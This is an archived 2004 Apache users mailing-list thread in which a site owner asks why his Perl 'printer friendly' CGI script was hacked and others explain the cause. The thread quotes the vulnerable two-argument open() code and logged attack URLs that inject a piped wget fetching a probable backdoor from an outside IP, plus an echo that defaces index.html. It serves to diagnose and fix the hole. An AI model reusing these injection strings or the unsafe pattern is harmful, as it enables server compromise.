Return-Path: Delivered-To: apmail-httpd-users-archive@www.apache.org Received: (qmail 691 invoked from network); 5 Dec 2004 21:32:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (209.237.227.199) by minotaur-2.apache.org with SMTP; 5 Dec 2004 21:32:10 -0000 Received: (qmail 40652 invoked by uid 500); 5 Dec 2004 21:31:54 -0000 Delivered-To: apmail-httpd-users-archive@httpd.apache.org Received: (qmail 40637 invoked by uid 500); 5 Dec 2004 21:31:54 -0000 Mailing-List: contact users-help@httpd.apache.org; run by ezmlm Precedence: bulk Reply-To: users@httpd.apache.org list-help: list-unsubscribe: list-post: Delivered-To: mailing list users@httpd.apache.org Received: (qmail 40624 invoked by uid 99); 5 Dec 2004 21:31:54 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=DNS_FROM_RFC_ABUSE,FROM_ENDS_IN_NUMS,HTML_20_30,HTML_MESSAGE,HTML_NONELEMENT_30_40 X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web60504.mail.yahoo.com (HELO web60504.mail.yahoo.com) (216.109.116.125) by apache.org (qpsmtpd/0.28) with SMTP; Sun, 05 Dec 2004 13:31:52 -0800 Received: (qmail 32953 invoked by uid 60001); 5 Dec 2004 21:31:49 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=3auaKH44xLgJM3c4ew9ECE/vSYc20JzBRcsCtS49JV6X6v6P686/QYN8RyruChR5Y9m7uHhRAMoZb9rtSLEmemsxguaTqAODkjA/4bWgFCdw4Q3RFPeW+n7md9pyJiZwt1xiFyt89k+Y33rRwSYqee+z6TIhqZd8Llaw/oVL6xQ= ; Message-ID: <20041205213149.32948.qmail@web60504.mail.yahoo.com> Received: from [198.241.217.3] by web60504.mail.yahoo.com via HTTP; Sun, 05 Dec 2004 13:31:49 PST Date: Sun, 5 Dec 2004 13:31:49 -0800 (PST) From: Murthy Ambaru To: users@httpd.apache.org, Bruce@Ivn.cl In-Reply-To: <41B38935.4090201@Ivn.cl> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1861686555-1102282309=:32452" X-Virus-Checked: Checked Subject: Re: [users@httpd] Security Problem X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N --0-1861686555-1102282309=:32452 Content-Type: text/plain; charset=us-ascii Thanks Dick and Ivan for the input....Well the programmer who worked on this is no longer here. So would it be sufficient if i just check in the Parse form if the input file has any kind of weird characters (such as %, |, wget etc.) and if it does, redirect it somewhere else? Or should i check if the file exists in the system? I thought of doing this initially, but i could not reproduce what the hacker did by using the same command. I wanted to reproduce it and then correct the script and retest it again so as to be sure that it is fixed Also, this in not in linux (its windows), so what should i do to check that the system is not already compromised....thanks a lot "Ivan Barrera A." wrote: As i see, you take the parameter file from the URL without parsing it (as dick explained on other post too) my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}"; if (!open(FILE,"$data_file")) { die "Can't open";} You are not checking if the file is really valid, and are passing additional cmds without even noticing. (the pipe is really dangerous) As Dick said... ask your programmer to fix this right up. (and try to examine your machine.. it may be already comprimsed.. if in redhat run rpm -VVV procps net-tools util-linux rpm , if nothing comes up, your good) Murthy Ambaru wrote: > Thanks for the explanation.So the file can be downloaded to /tmp/bind > directory in the server executing that script. As i said, i tried typing > in the URL used and got nothing. I did not check the /tmp/bind though(I > did not find that in the interface that i use to manage files on > server). So what would be an secure way of opening the file? > The script is in PERL. I am adding it below. Can you see anything weird > in it?? Thanks... > > #!/usr/local/bin/perl > print "Content-type: text/html\n\n"; > &parseForm; > open(HEADER,"printheader.html") ; > my @HEADER = ; > close(HEADER); > #print it! Put a # before print if you don't want a header printed... > print "@HEADER"; > my $data_file = > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}"; > if (!open(FILE,"$data_file")) { die "Can't open";} > my @FILE = ; > close(FILE); > $print = 1 ; > foreach $line(@FILE) { > if ($line =~ /beginimage/) { > print $line ; > $print = 0; > next ; > } > if ($line =~ /endimage/) { $print = 1 ; } > if ($print eq "1") { > print $line; > } > } > > ######################################################## > sub parseForm { > if ($ENV{'REQUEST_METHOD'} eq 'GET') { > # Split the name-value pairs > @pairs = split(/&/, $ENV{'QUERY_STRING'}); > } > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') { > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); > # Split the name-value pairs > @pairs = split(/&/, $buffer); > } > foreach $pair (@pairs) { > ($name, $value) = split(/=/, $pair); > # Un-Webify plus signs and %-encoding > $value =~ tr/+/ /; > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; > $FORM{$name} = $value; > } > } > > > */"Ivan Barrera A." /* wrote: > > I mean, the cgi script (which i dont know anything about) seems to > "open > " a file reffered by ?file= ... Probably an insecure way of "opening" > the file, leads to execute the rest of the statement. > > Look : > > ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind > > After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind > is appended. So , if the script execute this, the command wget will > exec, and download that file into /tmp/bind. > After that, using the same technique, you can exec anything you > want. so > the problem is the way of opening (or doing something else) to the > files > in the cgi script. > is it a c , perl , php , or any other language script ? > > Murthy Ambaru wrote: > > Thanks for the response Ivan. I am sorry i realy did not > understand what > > you mean by "download the file to /tmp/bind". when the printer > friendly > > link is clicked, this is the URL that will be accessed: > > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm > > ofcourse it depends on the page being clicked at. So the file > name will > > be passed as parameter to the CGI file. I included the CGI code > in my > > earlier mail, could you please take a look. > > Thanks, > > Murthy > > > > */"Ivan Barrera A." /* wrote: > > > > the url you entered, download the file bind to /tmp/bind . It's > > probably > > an irc bot or a backdoor. > > If someone did that, the version of the cgi script, is unsecure, and > > should be revised. > > > > Im sorry if i didnt clarify enough, but would be useful to see > that cgi. > > > > Murthy Ambaru wrote: > > > I have a question regarding security. There is a web site that > > has an > > > printer friendly version of web pages being dsiplayed using a CGI > > > script. Apparently when this was in use, the site was hacked and > > some > > > unwanted stuff posted on the site. I had a look at the access.log > > when > > > this occurred and this was what showed up(I just replaced the > > site name > > > with xyz, everything else is same): > > > > > > > > > /images/newswireprint.gif HTTP/1.0" 304 - > > > > > > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0 > > > > > > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0 > > > > > > > > > GET > > > > > > /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v > > > hosts/xyz.org/httpdocs/index.html| > > > > > > Can anyone understand how are they able to hack? I tried > > reproducing it > > > by typing in the above URL used by hackers, but could get nothing > > out of > > > it. The permissions on all the html docs folders are set to 755. > > > > > > Below is the CGI file being used. It basically strips images off. > > Can > > > anyone help with this problem? what should i be looking at to > > plug off > > > the security holes....Thanks a lot > > > > > > -Murthy > > > > > > > > > > > > #!/usr/local/bin/perl > > > > > > print "Content-type: text/html\n\n"; > > > > > > &parseForm; > > > > > > open(HEADER,"printheader.html") ; > > > my @HEADER = ; > > > close(HEADER); > > > #print it! Put a # before print if you don't want a header > printed... > > > print "@HEADER"; > > > > > > my $data_file = > > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}"; > > > > > > if (!open(FILE,"$data_file")) { die "Can't open";} > > > my @FILE = ; > > > close(FILE); > > > > > > $print = 1 ; > > > > > > foreach $line(@FILE) { > > > > > > if ($line =~ /beginimage/) { > > > print $line ; > > > $print = 0; > > > next ; > > > } > > > > > > if ($line =~ /endimage/) { $print = 1 ; } > > > > > > if ($print eq "1") { > > > print $line; > > > } > > > > > > } > > > > > > > > > ######################################################## > > > > > > sub parseForm { > > > > > > if ($ENV{'REQUEST_METHOD'} eq 'GET') { > > > # Split the name-value pairs > > > @pairs = split(/&/, $ENV{'QUERY_STRING'}); > > > } > > > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') { > > > > > > > > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); > > > > > > # Split the name-value pairs > > > @pairs = split(/&/, $buffer); > > > } > > > foreach $pair (@pairs) { > > > ($name, $value) = split(/=/, $pair); > > > > > > # Un-Webify plus signs and %-encoding > > > $value =~ tr/+/ /; > > > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; > > > > > > $FORM{$name} = $value; > > > } > > > > > > } > > > > > > > > > > > > > > > > > > ------------------------------------------------------------------------ > > > Do you Yahoo!? > > > Meet the all-new My Yahoo! � Try it today! > > > > --------------------------------------------------------------------- > > The official User-To-User support forum of the Apache HTTP Server > > Project. > > See for more info. > > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org > > " from the digest: users-digest-unsubscribe@httpd.apache.org > > For additional commands, e-mail: users-help@httpd.apache.org > > > > > ------------------------------------------------------------------------ > > Do you Yahoo!? > > The all-new My Yahoo! � What will yours do? > > --------------------------------------------------------------------- > The official User-To-User support forum of the Apache HTTP Server > Project. > See for more info. > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org > " from the digest: users-digest-unsubscribe@httpd.apache.org > For additional commands, e-mail: users-help@httpd.apache.org > > ------------------------------------------------------------------------ > Do you Yahoo!? > Yahoo! Mail - 250MB free storage. Do more. Manage less. > --------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See for more info. To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org " from the digest: users-digest-unsubscribe@httpd.apache.org For additional commands, e-mail: users-help@httpd.apache.org --------------------------------- Do you Yahoo!? Read only the mail you want - Yahoo! Mail SpamGuard. --0-1861686555-1102282309=:32452 Content-Type: text/html; charset=us-ascii
Thanks Dick and Ivan for the input....Well the programmer who worked on this is no longer here. So would it be sufficient if i just check in the Parse form if the input file has any kind of weird characters (such as %, |, wget etc.) and if it does, redirect it somewhere else? Or should i check if the file exists in the system? I thought of doing this initially, but i could not reproduce what the hacker did by using the same command. I wanted to  reproduce it and then correct the script and retest it again so as to be sure that it is fixed
Also, this in not in linux (its windows), so what should i do to check that the system is not already compromised....thanks a lot

"Ivan Barrera A." <Bruce@Ivn.cl> wrote:
As i see, you take the parameter file from the URL without parsing it
(as dick explained on other post too)

my $data_file =
"/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}

You are not checking if the file is really valid, and are passing
additional cmds without even noticing. (the pipe is really dangerous)

As Dick said... ask your programmer to fix this right up. (and try to
examine your machine.. it may be already comprimsed.. if in redhat run
rpm -VVV procps net-tools util-linux rpm , if nothing comes up, your good)



Murthy Ambaru wrote:
> Thanks for the explanation.So the file can be downloaded to /tmp/bind
> directory in the server executing that script. As i said, i tried typing
> in the URL used and got nothing. I did not check the /tmp/bind though(I
> did not find that in the interface that i use to manage files on
> server). So what would be an secure way of opening the file?
> The script is in PERL. I am adding it below. Can you see anything weird
> in it?? Thanks...
>
> #!/usr/local/bin/perl
> print "Content-type: text/html\n\n";
> &parseForm;
> open(HEADER,"printheader.html") ;
> my @HEADER =
;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
> my $data_file =
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = ;
> close(FILE);
> $print = 1 ;
> foreach $line(@FILE) {
> if ($line =~ /beginimage/) {
> print $line ;
> $print = 0;
> next ;
> }
> if ($line =~ /endimage/) { $print = 1 ; }
> if ($print eq "1") {
> print $line;
> }
> }
>
> ########################################################
> sub parseForm {
> if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> # Split the name-value pairs
> @pairs = split(/&/, $ENV{'QUERY_STRING'});
> }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
> }
> foreach $pair (@pairs) {
> ($name, $value) = split(/=/, $pair);
> # Un-Webify plus signs and %-encoding
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> $FORM{$name} = $value;
> }
> }
>
>
> */"Ivan Barrera A." /* wrote:
>
> I mean, the cgi script (which i dont know anything about) seems to
> "open
> " a file reffered by ?file= ... Probably an insecure way of "opening"
> the file, leads to execute the rest of the statement.
>
> Look :
>
> ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
>
> After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
> is appended. So , if the script execute this, the command wget will
> exec, and download that file into /tmp/bind.
> After that, using the same technique, you can exec anything you
> want. so
> the problem is the way of opening (or doing something else) to the
> files
> in the cgi script.
> is it a c , perl , php , or any other language script ?
>
> Murthy Ambaru wrote:
> > Thanks for the response Ivan. I am sorry i realy did not
> understand what
> > you mean by "download the file to /tmp/bind". when the printer
> friendly
> > link is clicked, this is the URL that will be accessed:
> > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> > ofcourse it depends on the page being clicked at. So the file
> name will
> > be passed as parameter to the CGI file. I included the CGI code
> in my
> > earlier mail, could you please take a look.
> > Thanks,
> > Murthy
> >
> > */"Ivan Barrera A." /* wrote:
> >
> > the url you entered, download the file bind to /tmp/bind . It's
> > probably
> > an irc bot or a backdoor.
> > If someone did that, the version of the cgi script, is unsecure, and
> > should be revised.
> >
> > Im sorry if i didnt clarify enough, but would be useful to see
> that cgi.
> >
> > Murthy Ambaru wrote:
> > > I have a question regarding security. There is a web site that
> > has an
> > > printer friendly version of web pages being dsiplayed using a CGI
> > > script. Apparently when this was in use, the site was hacked and
> > some
> > > unwanted stuff posted on the site. I had a look at the access.log
> > when
> > > this occurred and this was what showed up(I just replaced the
> > site name
> > > with xyz, everything else is same):
> > >
> > >
> > > /images/newswireprint.gif HTTP/1.0" 304 -
> > >
> > > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> > >
> > > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> > >
> > >
> > > GET
> > >
> >
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> > > hosts/xyz.org/httpdocs/index.html|
> > >
> > > Can anyone understand how are they able to hack? I tried
> > reproducing it
> > > by typing in the above URL used by hackers, but could get nothing
> > out of
> > > it. The permissions on all the html docs folders are set to 755.
> > >
> > > Below is the CGI file being used. It basically strips images off.
> > Can
> > > anyone help with this problem? what should i be looking at to
> > plug off
> > > the security holes....Thanks a lot
> > >
> > > -Murthy
> > >
> > >
> > >
> > > #!/usr/local/bin/perl
> > >
> > > print "Content-type: text/html\n\n";
> > >
> > > &parseForm;
> > >
> > > open(HEADER,"printheader.html") ;
> > > my @HEADER = ;
> > > close(HEADER);
> > > #print it! Put a # before print if you don't want a header
> printed...
> > > print "@HEADER";
> > >
> > > my $data_file =
> > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> > >
> > > if (!open(FILE,"$data_file")) { die "Can't open";}
> > > my @FILE = ;
> > > close(FILE);
> > >
> > > $print = 1 ;
> > >
> > > foreach $line(@FILE) {
> > >
> > > if ($line =~ /beginimage/) {
> > > print $line ;
> > > $print = 0;
> > > next ;
> > > }
> > >
> > > if ($line =~ /endimage/) { $print = 1 ; }
> > >
> > > if ($print eq "1") {
> > > print $line;
> > > }
> > >
> > > }
> > >
> > >
> > > ########################################################
> > >
> > > sub parseForm {
> > >
> > > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > > }
> > > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> > >
> > >
> > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> > >
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $buffer);
> > > }
> > > foreach $pair (@pairs) {
> > > ($name, $value) = split(/=/, $pair);
> > >
> > > # Un-Webify plus signs and %-encoding
> > > $value =~ tr/+/ /;
> > > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> > >
> > > $FORM{$name} = $value;
> > > }
> > >
> > > }
> > >
> > >
> > >
> > >
> > >
> >
> ------------------------------------------------------------------------
> > > Do you Yahoo!?
> > > Meet the all-new My Yahoo! � Try it today!
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
> > Project.
> > See for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > " from the digest: users-digest-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
> >
> ------------------------------------------------------------------------
> > Do you Yahoo!?
> > The all-new My Yahoo! � What will yours do?
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server
> Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Yahoo! Mail - 250MB free storage. Do more. Manage less.
>

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Do you Yahoo!?
Read only the mail you want - Yahoo! Mail SpamGuard. --0-1861686555-1102282309=:32452--